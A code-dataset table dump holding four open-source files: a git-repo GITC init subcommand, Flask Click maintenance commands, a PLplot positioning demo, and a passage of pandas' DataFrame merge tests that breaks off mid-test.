repo_name (stringlengths 5–92) | path (stringlengths 4–232) | copies (stringclasses, 19 values) | size (stringlengths 4–7) | content (stringlengths 721–1.04M) | license (stringclasses, 15 values) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 15–997) | alpha_frac (float64, 0.25–0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
lipro-yocto/git-repo | subcmds/gitc_init.py | 1 | 3060 | # Copyright (C) 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import gitc_utils
from command import GitcAvailableCommand
from manifest_xml import GitcManifest
from subcmds import init
import wrapper
class GitcInit(init.Init, GitcAvailableCommand):
common = True
helpSummary = "Initialize a GITC Client."
helpUsage = """
%prog [options] [client name]
"""
helpDescription = """
The '%prog' command is run to initialize a new GITC client for use
with the GITC file system.
This command sets up the client directory, initializes repo just as
'repo init' does, then downloads the manifest collection and installs
it in the .repo/ directory of the GITC client.
Once this is done, a GITC manifest is generated by pulling the HEAD
SHA for each project; the properly formatted XML file is then
installed as .manifest in the GITC client directory.
The -c argument is required to specify the GITC client name.
The optional -f argument can be used to specify the manifest file to
use for this GITC client.
"""
def _Options(self, p):
super(GitcInit, self)._Options(p, gitc_init=True)
g = p.add_option_group('GITC options')
g.add_option('-f', '--manifest-file',
dest='manifest_file',
help='Optional manifest file to use for this GITC client.')
g.add_option('-c', '--gitc-client',
dest='gitc_client',
help='The name of the gitc_client instance to create or modify.')
def Execute(self, opt, args):
gitc_client = gitc_utils.parse_clientdir(os.getcwd())
if not gitc_client or (opt.gitc_client and gitc_client != opt.gitc_client):
print('fatal: Please update your repo command. See go/gitc for instructions.',
file=sys.stderr)
sys.exit(1)
self.client_dir = os.path.join(gitc_utils.get_gitc_manifest_dir(),
gitc_client)
super(GitcInit, self).Execute(opt, args)
manifest_file = self.manifest.manifestFile
if opt.manifest_file:
if not os.path.exists(opt.manifest_file):
print('fatal: Specified manifest file %s does not exist.' %
opt.manifest_file)
sys.exit(1)
manifest_file = opt.manifest_file
manifest = GitcManifest(self.repodir, gitc_client)
manifest.Override(manifest_file)
gitc_utils.generate_gitc_manifest(None, manifest)
print('Please run `cd %s` to view your GITC client.' %
os.path.join(wrapper.Wrapper().GITC_FS_ROOT_DIR, gitc_client))
| apache-2.0 | 8,735,617,120,058,002,000 | 36.777778 | 84 | 0.699673 | false |
mohamed-aziz/realworld-flask | conduit/commands.py | 1 | 4204 | # -*- coding: utf-8 -*-
"""Click commands."""
import os
from glob import glob
from subprocess import call
import click
from flask import current_app
from flask.cli import with_appcontext
from werkzeug.exceptions import MethodNotAllowed, NotFound
HERE = os.path.abspath(os.path.dirname(__file__))
PROJECT_ROOT = os.path.join(HERE, os.pardir)
TEST_PATH = os.path.join(PROJECT_ROOT, 'tests')
@click.command()
def test():
"""Run the tests."""
import pytest
rv = pytest.main([TEST_PATH, '--verbose'])
exit(rv)
@click.command()
@click.option('-f', '--fix-imports', default=False, is_flag=True,
help='Fix imports using isort, before linting')
def lint(fix_imports):
"""Lint and check code style with flake8 and isort."""
skip = ['requirements']
root_files = glob('*.py')
root_directories = [
name for name in next(os.walk('.'))[1] if not name.startswith('.')]
files_and_directories = [
arg for arg in root_files + root_directories if arg not in skip]
def execute_tool(description, *args):
"""Execute a checking tool with its arguments."""
command_line = list(args) + files_and_directories
click.echo('{}: {}'.format(description, ' '.join(command_line)))
rv = call(command_line)
if rv != 0:
exit(rv)
if fix_imports:
execute_tool('Fixing import order', 'isort', '-rc')
execute_tool('Checking code style', 'flake8')
@click.command()
def clean():
"""Remove *.pyc and *.pyo files recursively starting at current directory.
Borrowed from Flask-Script, converted to use Click.
"""
for dirpath, _, filenames in os.walk('.'):
for filename in filenames:
if filename.endswith('.pyc') or filename.endswith('.pyo'):
full_pathname = os.path.join(dirpath, filename)
click.echo('Removing {}'.format(full_pathname))
os.remove(full_pathname)
@click.command()
@click.option('--url', default=None,
help='Url to test (ex. /static/image.png)')
@click.option('--order', default='rule',
help='Property on Rule to order by (default: rule)')
@with_appcontext
def urls(url, order):
"""Display all of the url matching routes for the project.
Borrowed from Flask-Script, converted to use Click.
"""
rows = []
column_length = 0
column_headers = ('Rule', 'Endpoint', 'Arguments')
if url:
try:
rule, arguments = (
current_app.url_map.bind('localhost')
.match(url, return_rule=True))
rows.append((rule.rule, rule.endpoint, arguments))
column_length = 3
except (NotFound, MethodNotAllowed) as e:
rows.append(('<{}>'.format(e), None, None))
column_length = 1
else:
rules = sorted(
current_app.url_map.iter_rules(),
key=lambda rule: getattr(rule, order))
for rule in rules:
rows.append((rule.rule, rule.endpoint, None))
column_length = 2
str_template = ''
table_width = 0
if column_length >= 1:
max_rule_length = max(len(r[0]) for r in rows)
max_rule_length = max_rule_length if max_rule_length > 4 else 4
str_template += '{:' + str(max_rule_length) + '}'
table_width += max_rule_length
if column_length >= 2:
max_endpoint_length = max(len(str(r[1])) for r in rows)
# max_endpoint_length = max(rows, key=len)
max_endpoint_length = (
max_endpoint_length if max_endpoint_length > 8 else 8)
str_template += ' {:' + str(max_endpoint_length) + '}'
table_width += 2 + max_endpoint_length
if column_length >= 3:
max_arguments_length = max(len(str(r[2])) for r in rows)
max_arguments_length = (
max_arguments_length if max_arguments_length > 9 else 9)
str_template += ' {:' + str(max_arguments_length) + '}'
table_width += 2 + max_arguments_length
click.echo(str_template.format(*column_headers[:column_length]))
click.echo('-' * table_width)
for row in rows:
click.echo(str_template.format(*row[:column_length]))
| mit | -989,138,570,625,253,100 | 32.632 | 78 | 0.599191 | false |
FreeScienceCommunity/PLPlot | examples/python/xw10.py | 1 | 1310 | # Copyright (C) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 Alan W. Irwin
# Window positioning demo.
#
# This file is part of PLplot.
#
# PLplot is free software; you can redistribute it and/or modify
# it under the terms of the GNU Library General Public License as published
# by the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# PLplot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public License
# along with PLplot; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
from plplot_py_demos import *
# main
#
# Demonstrates absolute positioning of graphs on a page.
def main():
pladv(0)
plvpor(0.0, 1.0, 0.0, 1.0)
plwind(0.0, 1.0, 0.0, 1.0)
plbox("bc", 0.0, 0, "bc", 0.0, 0)
plsvpa(50.0, 150.0, 50.0, 100.0)
plwind(0.0, 1.0, 0.0, 1.0)
plbox("bc", 0.0, 0, "bc", 0.0, 0)
plptex(0.5, 0.5, 1.0, 0.0, 0.5, "BOX at (50,150,50,100)")
# Restore defaults
#plcol0(1)
main()
| lgpl-2.1 | -6,735,022,043,337,639,000 | 29.465116 | 79 | 0.670992 | false |
rs2/pandas | pandas/tests/reshape/merge/test_merge.py | 1 | 78056 | from collections import OrderedDict
from datetime import date, datetime, timedelta
import random
import re
import numpy as np
import pytest
from pandas.core.dtypes.common import is_categorical_dtype, is_object_dtype
from pandas.core.dtypes.dtypes import CategoricalDtype
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Float64Index,
Int64Index,
IntervalIndex,
MultiIndex,
PeriodIndex,
RangeIndex,
Series,
TimedeltaIndex,
UInt64Index,
)
import pandas._testing as tm
from pandas.api.types import CategoricalDtype as CDT
from pandas.core.reshape.concat import concat
from pandas.core.reshape.merge import MergeError, merge
N = 50
NGROUPS = 8
def get_test_data(ngroups=NGROUPS, n=N):
unique_groups = list(range(ngroups))
arr = np.asarray(np.tile(unique_groups, n // ngroups))
if len(arr) < n:
arr = np.asarray(list(arr) + unique_groups[: n - len(arr)])
random.shuffle(arr)
return arr
def get_series():
return [
pd.Series([1], dtype="int64"),
pd.Series([1], dtype="Int64"),
pd.Series([1.23]),
pd.Series(["foo"]),
pd.Series([True]),
pd.Series([pd.Timestamp("2018-01-01")]),
pd.Series([pd.Timestamp("2018-01-01", tz="US/Eastern")]),
]
def get_series_na():
return [
pd.Series([np.nan], dtype="Int64"),
pd.Series([np.nan], dtype="float"),
pd.Series([np.nan], dtype="object"),
pd.Series([pd.NaT]),
]
@pytest.fixture(params=get_series(), ids=lambda x: x.dtype.name)
def series_of_dtype(request):
"""
A parametrized fixture returning a variety of Series of different
dtypes
"""
return request.param
@pytest.fixture(params=get_series(), ids=lambda x: x.dtype.name)
def series_of_dtype2(request):
"""
A duplicate of the series_of_dtype fixture, so that it can be used
twice by a single function
"""
return request.param
@pytest.fixture(params=get_series_na(), ids=lambda x: x.dtype.name)
def series_of_dtype_all_na(request):
"""
A parametrized fixture returning a variety of Series with all NA
values
"""
return request.param
class TestMerge:
def setup_method(self, method):
# aggregate multiple columns
self.df = DataFrame(
{
"key1": get_test_data(),
"key2": get_test_data(),
"data1": np.random.randn(N),
"data2": np.random.randn(N),
}
)
# exclude a couple keys for fun
self.df = self.df[self.df["key2"] > 1]
self.df2 = DataFrame(
{
"key1": get_test_data(n=N // 5),
"key2": get_test_data(ngroups=NGROUPS // 2, n=N // 5),
"value": np.random.randn(N // 5),
}
)
self.left = DataFrame(
{"key": ["a", "b", "c", "d", "e", "e", "a"], "v1": np.random.randn(7)}
)
self.right = DataFrame({"v2": np.random.randn(4)}, index=["d", "b", "c", "a"])
def test_merge_inner_join_empty(self):
# GH 15328
df_empty = pd.DataFrame()
df_a = pd.DataFrame({"a": [1, 2]}, index=[0, 1], dtype="int64")
result = pd.merge(df_empty, df_a, left_index=True, right_index=True)
expected = pd.DataFrame({"a": []}, index=[], dtype="int64")
tm.assert_frame_equal(result, expected)
def test_merge_common(self):
joined = merge(self.df, self.df2)
exp = merge(self.df, self.df2, on=["key1", "key2"])
tm.assert_frame_equal(joined, exp)
def test_merge_non_string_columns(self):
# https://github.com/pandas-dev/pandas/issues/17962
# Checks that method runs for non string column names
left = pd.DataFrame(
{0: [1, 0, 1, 0], 1: [0, 1, 0, 0], 2: [0, 0, 2, 0], 3: [1, 0, 0, 3]}
)
right = left.astype(float)
expected = left
result = pd.merge(left, right)
tm.assert_frame_equal(expected, result)
def test_merge_index_as_on_arg(self):
# GH14355
left = self.df.set_index("key1")
right = self.df2.set_index("key1")
result = merge(left, right, on="key1")
expected = merge(self.df, self.df2, on="key1").set_index("key1")
tm.assert_frame_equal(result, expected)
def test_merge_index_singlekey_right_vs_left(self):
left = DataFrame(
{"key": ["a", "b", "c", "d", "e", "e", "a"], "v1": np.random.randn(7)}
)
right = DataFrame({"v2": np.random.randn(4)}, index=["d", "b", "c", "a"])
merged1 = merge(
left, right, left_on="key", right_index=True, how="left", sort=False
)
merged2 = merge(
right, left, right_on="key", left_index=True, how="right", sort=False
)
tm.assert_frame_equal(merged1, merged2.loc[:, merged1.columns])
merged1 = merge(
left, right, left_on="key", right_index=True, how="left", sort=True
)
merged2 = merge(
right, left, right_on="key", left_index=True, how="right", sort=True
)
tm.assert_frame_equal(merged1, merged2.loc[:, merged1.columns])
def test_merge_index_singlekey_inner(self):
left = DataFrame(
{"key": ["a", "b", "c", "d", "e", "e", "a"], "v1": np.random.randn(7)}
)
right = DataFrame({"v2": np.random.randn(4)}, index=["d", "b", "c", "a"])
# inner join
result = merge(left, right, left_on="key", right_index=True, how="inner")
expected = left.join(right, on="key").loc[result.index]
tm.assert_frame_equal(result, expected)
result = merge(right, left, right_on="key", left_index=True, how="inner")
expected = left.join(right, on="key").loc[result.index]
tm.assert_frame_equal(result, expected.loc[:, result.columns])
def test_merge_misspecified(self):
msg = "Must pass right_on or right_index=True"
with pytest.raises(pd.errors.MergeError, match=msg):
merge(self.left, self.right, left_index=True)
msg = "Must pass left_on or left_index=True"
with pytest.raises(pd.errors.MergeError, match=msg):
merge(self.left, self.right, right_index=True)
msg = (
'Can only pass argument "on" OR "left_on" and "right_on", not '
"a combination of both"
)
with pytest.raises(pd.errors.MergeError, match=msg):
merge(self.left, self.left, left_on="key", on="key")
msg = r"len\(right_on\) must equal len\(left_on\)"
with pytest.raises(ValueError, match=msg):
merge(self.df, self.df2, left_on=["key1"], right_on=["key1", "key2"])
def test_index_and_on_parameters_confusion(self):
msg = "right_index parameter must be of type bool, not <class 'list'>"
with pytest.raises(ValueError, match=msg):
merge(
self.df,
self.df2,
how="left",
left_index=False,
right_index=["key1", "key2"],
)
msg = "left_index parameter must be of type bool, not <class 'list'>"
with pytest.raises(ValueError, match=msg):
merge(
self.df,
self.df2,
how="left",
left_index=["key1", "key2"],
right_index=False,
)
with pytest.raises(ValueError, match=msg):
merge(
self.df,
self.df2,
how="left",
left_index=["key1", "key2"],
right_index=["key1", "key2"],
)
def test_merge_overlap(self):
merged = merge(self.left, self.left, on="key")
exp_len = (self.left["key"].value_counts() ** 2).sum()
assert len(merged) == exp_len
assert "v1_x" in merged
assert "v1_y" in merged
def test_merge_different_column_key_names(self):
left = DataFrame({"lkey": ["foo", "bar", "baz", "foo"], "value": [1, 2, 3, 4]})
right = DataFrame({"rkey": ["foo", "bar", "qux", "foo"], "value": [5, 6, 7, 8]})
merged = left.merge(
right, left_on="lkey", right_on="rkey", how="outer", sort=True
)
exp = pd.Series(["bar", "baz", "foo", "foo", "foo", "foo", np.nan], name="lkey")
tm.assert_series_equal(merged["lkey"], exp)
exp = pd.Series(["bar", np.nan, "foo", "foo", "foo", "foo", "qux"], name="rkey")
tm.assert_series_equal(merged["rkey"], exp)
exp = pd.Series([2, 3, 1, 1, 4, 4, np.nan], name="value_x")
tm.assert_series_equal(merged["value_x"], exp)
exp = pd.Series([6, np.nan, 5, 8, 5, 8, 7], name="value_y")
tm.assert_series_equal(merged["value_y"], exp)
def test_merge_copy(self):
left = DataFrame({"a": 0, "b": 1}, index=range(10))
right = DataFrame({"c": "foo", "d": "bar"}, index=range(10))
merged = merge(left, right, left_index=True, right_index=True, copy=True)
merged["a"] = 6
assert (left["a"] == 0).all()
merged["d"] = "peekaboo"
assert (right["d"] == "bar").all()
def test_merge_nocopy(self):
left = DataFrame({"a": 0, "b": 1}, index=range(10))
right = DataFrame({"c": "foo", "d": "bar"}, index=range(10))
merged = merge(left, right, left_index=True, right_index=True, copy=False)
merged["a"] = 6
assert (left["a"] == 6).all()
merged["d"] = "peekaboo"
assert (right["d"] == "peekaboo").all()
def test_intelligently_handle_join_key(self):
# #733, be a bit more 1337 about not returning unconsolidated DataFrame
left = DataFrame(
{"key": [1, 1, 2, 2, 3], "value": list(range(5))}, columns=["value", "key"]
)
right = DataFrame({"key": [1, 1, 2, 3, 4, 5], "rvalue": list(range(6))})
joined = merge(left, right, on="key", how="outer")
expected = DataFrame(
{
"key": [1, 1, 1, 1, 2, 2, 3, 4, 5],
"value": np.array([0, 0, 1, 1, 2, 3, 4, np.nan, np.nan]),
"rvalue": [0, 1, 0, 1, 2, 2, 3, 4, 5],
},
columns=["value", "key", "rvalue"],
)
tm.assert_frame_equal(joined, expected)
def test_merge_join_key_dtype_cast(self):
# #8596
df1 = DataFrame({"key": [1], "v1": [10]})
df2 = DataFrame({"key": [2], "v1": [20]})
df = merge(df1, df2, how="outer")
assert df["key"].dtype == "int64"
df1 = DataFrame({"key": [True], "v1": [1]})
df2 = DataFrame({"key": [False], "v1": [0]})
df = merge(df1, df2, how="outer")
# GH13169
# this really should be bool
assert df["key"].dtype == "object"
df1 = DataFrame({"val": [1]})
df2 = DataFrame({"val": [2]})
lkey = np.array([1])
rkey = np.array([2])
df = merge(df1, df2, left_on=lkey, right_on=rkey, how="outer")
assert df["key_0"].dtype == "int64"
def test_handle_join_key_pass_array(self):
left = DataFrame(
{"key": [1, 1, 2, 2, 3], "value": np.arange(5)}, columns=["value", "key"]
)
right = DataFrame({"rvalue": np.arange(6)})
key = np.array([1, 1, 2, 3, 4, 5])
merged = merge(left, right, left_on="key", right_on=key, how="outer")
merged2 = merge(right, left, left_on=key, right_on="key", how="outer")
tm.assert_series_equal(merged["key"], merged2["key"])
assert merged["key"].notna().all()
assert merged2["key"].notna().all()
left = DataFrame({"value": np.arange(5)}, columns=["value"])
right = DataFrame({"rvalue": np.arange(6)})
lkey = np.array([1, 1, 2, 2, 3])
rkey = np.array([1, 1, 2, 3, 4, 5])
merged = merge(left, right, left_on=lkey, right_on=rkey, how="outer")
tm.assert_series_equal(
merged["key_0"], Series([1, 1, 1, 1, 2, 2, 3, 4, 5], name="key_0")
)
left = DataFrame({"value": np.arange(3)})
right = DataFrame({"rvalue": np.arange(6)})
key = np.array([0, 1, 1, 2, 2, 3], dtype=np.int64)
merged = merge(left, right, left_index=True, right_on=key, how="outer")
tm.assert_series_equal(merged["key_0"], Series(key, name="key_0"))
def test_no_overlap_more_informative_error(self):
dt = datetime.now()
df1 = DataFrame({"x": ["a"]}, index=[dt])
df2 = DataFrame({"y": ["b", "c"]}, index=[dt, dt])
msg = (
"No common columns to perform merge on. "
f"Merge options: left_on={None}, right_on={None}, "
f"left_index={False}, right_index={False}"
)
with pytest.raises(MergeError, match=msg):
merge(df1, df2)
def test_merge_non_unique_indexes(self):
dt = datetime(2012, 5, 1)
dt2 = datetime(2012, 5, 2)
dt3 = datetime(2012, 5, 3)
dt4 = datetime(2012, 5, 4)
df1 = DataFrame({"x": ["a"]}, index=[dt])
df2 = DataFrame({"y": ["b", "c"]}, index=[dt, dt])
_check_merge(df1, df2)
# Not monotonic
df1 = DataFrame({"x": ["a", "b", "q"]}, index=[dt2, dt, dt4])
df2 = DataFrame(
{"y": ["c", "d", "e", "f", "g", "h"]}, index=[dt3, dt3, dt2, dt2, dt, dt]
)
_check_merge(df1, df2)
df1 = DataFrame({"x": ["a", "b"]}, index=[dt, dt])
df2 = DataFrame({"y": ["c", "d"]}, index=[dt, dt])
_check_merge(df1, df2)
def test_merge_non_unique_index_many_to_many(self):
dt = datetime(2012, 5, 1)
dt2 = datetime(2012, 5, 2)
dt3 = datetime(2012, 5, 3)
df1 = DataFrame({"x": ["a", "b", "c", "d"]}, index=[dt2, dt2, dt, dt])
df2 = DataFrame(
{"y": ["e", "f", "g", " h", "i"]}, index=[dt2, dt2, dt3, dt, dt]
)
_check_merge(df1, df2)
def test_left_merge_empty_dataframe(self):
left = DataFrame({"key": [1], "value": [2]})
right = DataFrame({"key": []})
result = merge(left, right, on="key", how="left")
tm.assert_frame_equal(result, left)
result = merge(right, left, on="key", how="right")
tm.assert_frame_equal(result, left)
@pytest.mark.parametrize(
"kwarg",
[
dict(left_index=True, right_index=True),
dict(left_index=True, right_on="x"),
dict(left_on="a", right_index=True),
dict(left_on="a", right_on="x"),
],
)
def test_merge_left_empty_right_empty(self, join_type, kwarg):
# GH 10824
left = pd.DataFrame(columns=["a", "b", "c"])
right = pd.DataFrame(columns=["x", "y", "z"])
exp_in = pd.DataFrame(
columns=["a", "b", "c", "x", "y", "z"],
index=pd.Index([], dtype=object),
dtype=object,
)
result = pd.merge(left, right, how=join_type, **kwarg)
tm.assert_frame_equal(result, exp_in)
def test_merge_left_empty_right_notempty(self):
# GH 10824
left = pd.DataFrame(columns=["a", "b", "c"])
right = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["x", "y", "z"])
exp_out = pd.DataFrame(
{
"a": np.array([np.nan] * 3, dtype=object),
"b": np.array([np.nan] * 3, dtype=object),
"c": np.array([np.nan] * 3, dtype=object),
"x": [1, 4, 7],
"y": [2, 5, 8],
"z": [3, 6, 9],
},
columns=["a", "b", "c", "x", "y", "z"],
)
exp_in = exp_out[0:0] # make empty DataFrame keeping dtype
# result will have object dtype
exp_in.index = exp_in.index.astype(object)
def check1(exp, kwarg):
result = pd.merge(left, right, how="inner", **kwarg)
tm.assert_frame_equal(result, exp)
result = pd.merge(left, right, how="left", **kwarg)
tm.assert_frame_equal(result, exp)
def check2(exp, kwarg):
result = pd.merge(left, right, how="right", **kwarg)
tm.assert_frame_equal(result, exp)
result = pd.merge(left, right, how="outer", **kwarg)
tm.assert_frame_equal(result, exp)
for kwarg in [
dict(left_index=True, right_index=True),
dict(left_index=True, right_on="x"),
]:
check1(exp_in, kwarg)
check2(exp_out, kwarg)
kwarg = dict(left_on="a", right_index=True)
check1(exp_in, kwarg)
exp_out["a"] = [0, 1, 2]
check2(exp_out, kwarg)
kwarg = dict(left_on="a", right_on="x")
check1(exp_in, kwarg)
exp_out["a"] = np.array([np.nan] * 3, dtype=object)
check2(exp_out, kwarg)
def test_merge_left_notempty_right_empty(self):
# GH 10824
left = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["a", "b", "c"])
right = pd.DataFrame(columns=["x", "y", "z"])
exp_out = pd.DataFrame(
{
"a": [1, 4, 7],
"b": [2, 5, 8],
"c": [3, 6, 9],
"x": np.array([np.nan] * 3, dtype=object),
"y": np.array([np.nan] * 3, dtype=object),
"z": np.array([np.nan] * 3, dtype=object),
},
columns=["a", "b", "c", "x", "y", "z"],
)
exp_in = exp_out[0:0] # make empty DataFrame keeping dtype
# result will have object dtype
exp_in.index = exp_in.index.astype(object)
def check1(exp, kwarg):
result = pd.merge(left, right, how="inner", **kwarg)
tm.assert_frame_equal(result, exp)
result = pd.merge(left, right, how="right", **kwarg)
tm.assert_frame_equal(result, exp)
def check2(exp, kwarg):
result = pd.merge(left, right, how="left", **kwarg)
tm.assert_frame_equal(result, exp)
result = pd.merge(left, right, how="outer", **kwarg)
tm.assert_frame_equal(result, exp)
for kwarg in [
dict(left_index=True, right_index=True),
dict(left_index=True, right_on="x"),
dict(left_on="a", right_index=True),
dict(left_on="a", right_on="x"),
]:
check1(exp_in, kwarg)
check2(exp_out, kwarg)
def test_merge_empty_frame(self, series_of_dtype, series_of_dtype2):
# GH 25183
df = pd.DataFrame(
{"key": series_of_dtype, "value": series_of_dtype2},
columns=["key", "value"],
)
df_empty = df[:0]
expected = pd.DataFrame(
{
"value_x": pd.Series(dtype=df.dtypes["value"]),
"key": pd.Series(dtype=df.dtypes["key"]),
"value_y": pd.Series(dtype=df.dtypes["value"]),
},
columns=["value_x", "key", "value_y"],
)
actual = df_empty.merge(df, on="key")
tm.assert_frame_equal(actual, expected)
def test_merge_all_na_column(self, series_of_dtype, series_of_dtype_all_na):
# GH 25183
df_left = pd.DataFrame(
{"key": series_of_dtype, "value": series_of_dtype_all_na},
columns=["key", "value"],
)
df_right = pd.DataFrame(
{"key": series_of_dtype, "value": series_of_dtype_all_na},
columns=["key", "value"],
)
expected = pd.DataFrame(
{
"key": series_of_dtype,
"value_x": series_of_dtype_all_na,
"value_y": series_of_dtype_all_na,
},
columns=["key", "value_x", "value_y"],
)
actual = df_left.merge(df_right, on="key")
tm.assert_frame_equal(actual, expected)
def test_merge_nosort(self):
# GH#2098, TODO: anything to do?
d = {
"var1": np.random.randint(0, 10, size=10),
"var2": np.random.randint(0, 10, size=10),
"var3": [
datetime(2012, 1, 12),
datetime(2011, 2, 4),
datetime(2010, 2, 3),
datetime(2012, 1, 12),
datetime(2011, 2, 4),
datetime(2012, 4, 3),
datetime(2012, 3, 4),
datetime(2008, 5, 1),
datetime(2010, 2, 3),
datetime(2012, 2, 3),
],
}
df = DataFrame.from_dict(d)
var3 = df.var3.unique()
var3.sort()
new = DataFrame.from_dict({"var3": var3, "var8": np.random.random(7)})
result = df.merge(new, on="var3", sort=False)
exp = merge(df, new, on="var3", sort=False)
tm.assert_frame_equal(result, exp)
assert (df.var3.unique() == result.var3.unique()).all()
def test_merge_nan_right(self):
df1 = DataFrame({"i1": [0, 1], "i2": [0, 1]})
df2 = DataFrame({"i1": [0], "i3": [0]})
result = df1.join(df2, on="i1", rsuffix="_")
expected = (
DataFrame(
{
"i1": {0: 0.0, 1: 1},
"i2": {0: 0, 1: 1},
"i1_": {0: 0, 1: np.nan},
"i3": {0: 0.0, 1: np.nan},
None: {0: 0, 1: 0},
}
)
.set_index(None)
.reset_index()[["i1", "i2", "i1_", "i3"]]
)
tm.assert_frame_equal(result, expected, check_dtype=False)
df1 = DataFrame({"i1": [0, 1], "i2": [0.5, 1.5]})
df2 = DataFrame({"i1": [0], "i3": [0.7]})
result = df1.join(df2, rsuffix="_", on="i1")
expected = DataFrame(
{
"i1": {0: 0, 1: 1},
"i1_": {0: 0.0, 1: np.nan},
"i2": {0: 0.5, 1: 1.5},
"i3": {0: 0.69999999999999996, 1: np.nan},
}
)[["i1", "i2", "i1_", "i3"]]
tm.assert_frame_equal(result, expected)
def test_merge_type(self):
class NotADataFrame(DataFrame):
@property
def _constructor(self):
return NotADataFrame
nad = NotADataFrame(self.df)
result = nad.merge(self.df2, on="key1")
assert isinstance(result, NotADataFrame)
def test_join_append_timedeltas(self):
# timedelta64 issues with join/merge
# GH 5695
d = {"d": datetime(2013, 11, 5, 5, 56), "t": timedelta(0, 22500)}
df = DataFrame(columns=list("dt"))
df = df.append(d, ignore_index=True)
result = df.append(d, ignore_index=True)
expected = DataFrame(
{
"d": [datetime(2013, 11, 5, 5, 56), datetime(2013, 11, 5, 5, 56)],
"t": [timedelta(0, 22500), timedelta(0, 22500)],
}
)
tm.assert_frame_equal(result, expected)
td = np.timedelta64(300000000)
lhs = DataFrame(Series([td, td], index=["A", "B"]))
rhs = DataFrame(Series([td], index=["A"]))
result = lhs.join(rhs, rsuffix="r", how="left")
expected = DataFrame(
{
"0": Series([td, td], index=list("AB")),
"0r": Series([td, pd.NaT], index=list("AB")),
}
)
tm.assert_frame_equal(result, expected)
def test_other_datetime_unit(self):
# GH 13389
df1 = pd.DataFrame({"entity_id": [101, 102]})
s = pd.Series([None, None], index=[101, 102], name="days")
for dtype in [
"datetime64[D]",
"datetime64[h]",
"datetime64[m]",
"datetime64[s]",
"datetime64[ms]",
"datetime64[us]",
"datetime64[ns]",
]:
df2 = s.astype(dtype).to_frame("days")
# coerces to datetime64[ns], thus should not be affected
assert df2["days"].dtype == "datetime64[ns]"
result = df1.merge(df2, left_on="entity_id", right_index=True)
exp = pd.DataFrame(
{
"entity_id": [101, 102],
"days": np.array(["nat", "nat"], dtype="datetime64[ns]"),
},
columns=["entity_id", "days"],
)
tm.assert_frame_equal(result, exp)
@pytest.mark.parametrize("unit", ["D", "h", "m", "s", "ms", "us", "ns"])
def test_other_timedelta_unit(self, unit):
# GH 13389
df1 = pd.DataFrame({"entity_id": [101, 102]})
s = pd.Series([None, None], index=[101, 102], name="days")
dtype = f"m8[{unit}]"
df2 = s.astype(dtype).to_frame("days")
assert df2["days"].dtype == "m8[ns]"
result = df1.merge(df2, left_on="entity_id", right_index=True)
exp = pd.DataFrame(
{"entity_id": [101, 102], "days": np.array(["nat", "nat"], dtype=dtype)},
columns=["entity_id", "days"],
)
tm.assert_frame_equal(result, exp)
def test_overlapping_columns_error_message(self):
df = DataFrame({"key": [1, 2, 3], "v1": [4, 5, 6], "v2": [7, 8, 9]})
df2 = DataFrame({"key": [1, 2, 3], "v1": [4, 5, 6], "v2": [7, 8, 9]})
df.columns = ["key", "foo", "foo"]
df2.columns = ["key", "bar", "bar"]
expected = DataFrame(
{
"key": [1, 2, 3],
"v1": [4, 5, 6],
"v2": [7, 8, 9],
"v3": [4, 5, 6],
"v4": [7, 8, 9],
}
)
expected.columns = ["key", "foo", "foo", "bar", "bar"]
tm.assert_frame_equal(merge(df, df2), expected)
# #2649, #10639
df2.columns = ["key1", "foo", "foo"]
msg = r"Data columns not unique: Index\(\['foo', 'foo'\], dtype='object'\)"
with pytest.raises(MergeError, match=msg):
merge(df, df2)
def test_merge_on_datetime64tz(self):
# GH11405
left = pd.DataFrame(
{
"key": pd.date_range("20151010", periods=2, tz="US/Eastern"),
"value": [1, 2],
}
)
right = pd.DataFrame(
{
"key": pd.date_range("20151011", periods=3, tz="US/Eastern"),
"value": [1, 2, 3],
}
)
expected = DataFrame(
{
"key": pd.date_range("20151010", periods=4, tz="US/Eastern"),
"value_x": [1, 2, np.nan, np.nan],
"value_y": [np.nan, 1, 2, 3],
}
)
result = pd.merge(left, right, on="key", how="outer")
tm.assert_frame_equal(result, expected)
left = pd.DataFrame(
{
"key": [1, 2],
"value": pd.date_range("20151010", periods=2, tz="US/Eastern"),
}
)
right = pd.DataFrame(
{
"key": [2, 3],
"value": pd.date_range("20151011", periods=2, tz="US/Eastern"),
}
)
expected = DataFrame(
{
"key": [1, 2, 3],
"value_x": list(pd.date_range("20151010", periods=2, tz="US/Eastern"))
+ [pd.NaT],
"value_y": [pd.NaT]
+ list(pd.date_range("20151011", periods=2, tz="US/Eastern")),
}
)
result = pd.merge(left, right, on="key", how="outer")
tm.assert_frame_equal(result, expected)
assert result["value_x"].dtype == "datetime64[ns, US/Eastern]"
assert result["value_y"].dtype == "datetime64[ns, US/Eastern]"
def test_merge_on_datetime64tz_empty(self):
# https://github.com/pandas-dev/pandas/issues/25014
dtz = pd.DatetimeTZDtype(tz="UTC")
right = pd.DataFrame(
{
"date": [pd.Timestamp("2018", tz=dtz.tz)],
"value": [4.0],
"date2": [pd.Timestamp("2019", tz=dtz.tz)],
},
columns=["date", "value", "date2"],
)
left = right[:0]
result = left.merge(right, on="date")
expected = pd.DataFrame(
{
"value_x": pd.Series(dtype=float),
"date2_x": pd.Series(dtype=dtz),
"date": pd.Series(dtype=dtz),
"value_y": pd.Series(dtype=float),
